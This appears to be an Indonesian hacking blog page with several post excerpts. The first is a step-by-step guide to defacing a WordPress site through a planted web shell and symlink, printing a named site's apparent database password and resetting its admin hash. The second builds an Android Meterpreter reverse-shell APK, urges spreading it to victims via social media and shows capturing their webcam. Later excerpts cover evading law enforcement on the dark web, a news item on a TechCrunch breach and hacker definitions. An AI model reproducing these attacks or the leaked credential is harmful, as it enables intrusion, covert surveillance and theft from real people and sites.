Tutorial Deface Website Dengan Teknik Symlink

Pertama masuk ke Shell yang sudah di tanam di web target.

lalu upload Sym.php ( Digunakan untuk SYMLINK ).

Klo belum punya silahkan Download Disini

 

Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.

Selanjutnya akses / buka symlink yang telah agan upload.

Lalu klik user & domain & symlink.

Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".

Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.

Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.

Perhatikan baris ini :

define('DB_HOST', 'localhost');

DB NAME = thefussy_wrdp3

DB USER = thefussy_wrdp3

DB PASSWORD = CZyLRz1EuwSd

DB HOST = localhost

Diatas adalah informasi mengenai Akses Database MySQL.

Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.

Klik koneksi MySQL.

Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.

Jika di dalam shell agan tidak ada menu Koneksi MySQL Download lalu Upload , akses dan login.

Lalu, saya klik "wp_user".

Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja

Agan buat password dalam bentuk MD5 Disini .

Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a

Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.

Berarti saya akan login dengan username admin dan password 121212.

Sekarang kita coba sob.

Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin

Saya login & wauuuuu, kereennn sob.

Saya berhasil masuk.

Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak

 

~Selamat Mencoba ~

READMORE

Cara Hacking android dengan Metasploit

Bahan - Bahan:

1. Metasploit framework (kali linux)
2. Smartphone Android

ada kan apa aja yang harus di butuhinnya? kalau ada langsung aja kita mulai.

  1.Buat Exploitnya
 Kita akan menggunakan Metasploit payload framework untuk membuat exploitnya pada tutorial kali ini, dengan cara menjalankan perintah di bawah ini untuk membuat exploitnya.

msfpayload android/meterpreter/reverse_tcp LHOST=IP_Kalian LPORT=Port_kalian R > hack.apk

Catatan : inget kalian harus mengganti IP_Kalian dan Port_Kalian dengan IP dan Port yang kalian miliki jangan asal copas terus jalanin aja wkwkwkwk. Tapi saya saranin kalo portnya pake port 443 aja.

  2. Persiapan Handler
 Persiapkan Handler untuk menghandle koneksi yang masuk dari korban tadi, di payload kita menggunakan port 443, kenapa? Karena kebanyakan firewall mengijinkan jaringan tersebut dan tidak mendeteksi sebagai ancaman. Buka Metasploit console dengan menjalankan perintah di bawah ini.

msfconsole

 

3.Membuat Handler
 Jika Metasploit console sudah terbuka saatnya kita membuat handlernya.

Masukan perintah ini untuk menggunakan handlernya.

 #use exploit/multi/handler

 lalu masukan yang ini, pastikan payloadnya sama ya.

 #set payload android/meterpreter/reverse_tcp

4. Konfigurasi Metasploit
 saatnya kita menkonfigurasi Payloadnya, silahkan konfig sesuai data yang kalian miliki.

set lhost IP_Kalian
set lport Port_Kalian

Yap handlernya sudah jalan mas bro.
 
 Catatan : Sekali lagi inget jangan asal copas.

4.  Sebar file APKnya
 Nah exploit udah jadi handler juga udah jadi sekarang adalah bagian tersulit dalam proses Hack ponsel android ini [ CCCCiiiiiieeeee hack cccciiiiiieeeeeeeeee], dan sekaligus menjadi faktor kesuksesan kalian, kalian bisa sebar file apknya lewat sosial media, blog, forum, atau apa pun itu sebisa kalian, kata kata nya harus yang meyakinkan kaya waktu meyakinkan cewe kalian #EHHHH

5. Ketika ada korban yang menginstal
 Ketika ada korban yang menginstal apknya bakal muncul kaya gini bro tampilan di Metasploit Consolenya.

 6. Terserah mau di apain
 Kalo udah ada korban yang udah nginstal silahkan kalian mau apain hpnya, contohnya mengambil foto dengan kamera hp korban. Untuk mengambil foto atau gambar dengan kamera hp korban silahkan masukan dan jalankan tentunya kode di bawah ini\

webcam_list (untuk melihat ada kamera apa aja yang tersedia di hpnya)

webcam_snap (Untuk mengambil gambar dari hp korban)

 7. Eng ing eng........
 Inilah foto yang berhasil di ambil dengan kamera di hp korban

READMORE

How To Access The Dark Web

Apakah Anda mencoba untuk mencari tahu bagaimana untuk mengakses web gelap? Yah tidak terlihat lagi, kami telah pergi dan melakukan penelitian sehingga kita bisa menampilkan yang terbaik dan paling aman untuk mengakses web dalam.
Menurut peneliti hanya 4% dari internet dapat dilihat oleh masyarakat umum.penggunaan TOR Anda sedang diawasi
Yang berarti bahwa sisa 96% dari internet terdiri dari "The Deep Web".
Gelap Web atau gelap Net adalah bagian dari web yang mendalam.
Jika Anda mencari untuk mengakses pasar tersembunyi atau situs net yang mendalam (dengan domain .onion) itu dilakukan dengan menggunakan jaringan TOR dan bundel browser.
Hal ini sangat mudah untuk mengakses web gelap, tetapi jika Anda baru ke web dalam, panduan ini akan membantu Anda dalam perjalanan Anda.
Harap Catatan: Ini hanya panduan dasar untuk mengakses web dalam. Itu tidak menjamin anonimitas!
Jika Anda menggunakan TOR untuk sesuatu yang jahat, Anda harus berpikir serius tentang privasi dan keamanan. Jolly Roger telah mengumpulkan panduan yang komprehensif tentang bagaimana untuk tetap aman di web dalam, melihat panduan di sini.
KHUSUS anonimitas TIP: Anda harus mengambil anonimitas Anda sangat serius jika Anda mengunjungi Deep Web dan terutama jika Anda melihat setiap Markets Darknet.
Hal pertama yang harus Anda lakukan sebelum melakukan apapun semakin diri Anda VPN. ISP dan Instansi Pemerintah pelacakan dan penebangan semua yang Anda lakukan secara online sekarang sehingga tidak membuat mudah bagi mereka untuk menangkap Anda.
Mereka akan melacak yang download Tor, ISP sudah masuk penggunaan dan lembaga Tor Anda seperti DEA dan NSA akan menggali melalui data dengan seksama.
Jika Anda menggunakan VPN baik yang membuat tidak ada log maka lalu lintas internet Anda benar-benar terenkripsi sehingga tidak bahkan ISP atau Penegakan Hukum bahkan akan tahu bahwa Anda menggunakan Tor apalagi melihat Darknet Markets.
Cari VPN baik dan murah di sini:  https://darkwebnews.com/DeepWebVPN
 Cara Akses The Dark Web Gratis
Anda tidak dapat mengakses web dalam hanya menggunakan browser umum seperti Internet Explorer atau Google Chrome, Anda perlu men-download bundel TOR browser. Hanya mendapatkannya dari situs TOR resmi, tidak pernah men-download dari tempat lain!

Cara Akses The Dark Web Gratis

Anda tidak dapat mengakses web dalam hanya menggunakan browser umum seperti Internet Explorer atau Google Chrome, Anda perlu men-download bundel TOR browser. Hanya mendapatkannya dari situs TOR resmi, tidak pernah men-download dari tempat lain!

Cari download di sini:  https://www.torproject.org/download/download.html

READMORE

TechCrunch hacked for security check

 

Situs teknologi terkenal, TechCrunch menjadi korban terbaru dari kelompok hacker, OurMine.
Kelompok ini menggambarkan dirinya sebagai 'kelompok hacker elit yang dikenal selama bertahun-hacks menunjukkan kerentanan dalam sistem utama'. Untuk beberapa waktu mereka sudah terkenal mengorbankan selebriti profil tinggi rekening Twitter dan DDoS-ing sifat panas seperti Pokemon Go.

 OurMine Keamanan memperoleh akses penerbitan ke situs Verizon milik, yang menggunakan populer sistem manajemen konten Wordpress, dan diposting pesan sekarang terkenal nya. Daripada benar-benar mengotori situs, OurMine memilih bukan untuk hanya posting berita untuk menunjukkan bahwa CMS telah dilanggar.
Kelompok itu mengatakan bahwa hack situs untuk memeriksa keamanan. Sebuah posting di situs di bawah byline penulis yang berbasis di Seattle Devin Coldewey mengatakan: "Hello Guys, jangan khawatir kita hanya menguji keamanan TechCrunch, kami tidak mengubah password, silahkan hubungi kami." Cerita muncul di atas TechCrunch dengan, spanduk merah yang sangat-terlihat besar.

The OurMine postingan muncul di sekitar 5:10 namun dilepas dalam waktu dua jam. Itu masih menunjukkan indeks dan cache Google pada saat penulisan. Tidak butuh waktu lama TechCrunch untuk melihat dan menghapus cerita.

otentikasi multi-faktor adalah keamanan tingkat dasar untuk setiap organisasi berita. TechCrunch mengakui bahwa re-digunakan password harus telah berperan untuk hack ini. Berbagi password antara situs dan layanan adalah yang terburuk.

READMORE

Perbedaan White hat hacker Dan Black hat hacker

White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.
Black hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yaitu mereka yang menerobos keamanan sistem komputer tanpa ijin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut. Istilah cracker diajukan oleh Richard Stallman untuk me

READMORE